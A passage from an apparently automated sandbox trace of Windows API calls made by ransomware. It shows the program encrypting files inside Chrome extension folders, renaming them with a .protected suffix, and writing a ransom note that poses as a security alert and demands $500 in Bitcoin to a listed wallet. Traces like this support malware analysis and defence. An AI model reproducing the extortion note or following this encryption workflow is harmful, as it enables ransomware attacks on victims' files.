(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.023] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.023] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.023] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.023] CloseHandle (hObject=0x164) returned 1 [0079.023] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0079.023] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned 141 [0079.023] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0079.023] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0079.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*") returned 143 [0079.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.023] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.024] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.024] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.024] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.024] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\.") returned 143 [0079.024] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.024] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.024] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.024] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.024] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.024] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\..") returned 144 [0079.024] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.024] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.024] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.024] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.024] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.025] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.025] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.025] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.025] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0079.026] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.026] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0079.026] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.026] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.026] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.026] CloseHandle (hObject=0x168) returned 1 [0079.026] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.protected") returned 165 [0079.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.protected")) returned 1 [0079.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.027] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0079.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.027] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.027] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.028] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.028] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.028] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.028] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.028] CloseHandle (hObject=0x164) returned 1 [0079.028] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0079.028] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned 141 [0079.028] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0079.028] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0079.028] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*") returned 143 [0079.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.029] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.029] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.029] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.029] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.029] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.029] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\.") returned 143 [0079.029] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.029] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.029] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.029] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.029] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.029] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.029] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.029] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\..") returned 144 [0079.029] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.029] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.029] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.029] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0079.029] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.029] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.029] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.029] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0079.030] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0079.030] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0079.030] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.030] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0079.031] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.031] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0079.031] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.031] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.031] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.031] CloseHandle (hObject=0x168) returned 1 [0079.031] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.protected") returned 165 [0079.031] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.protected")) returned 1 [0079.032] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.032] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0079.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.032] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.032] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.033] lstrlenA 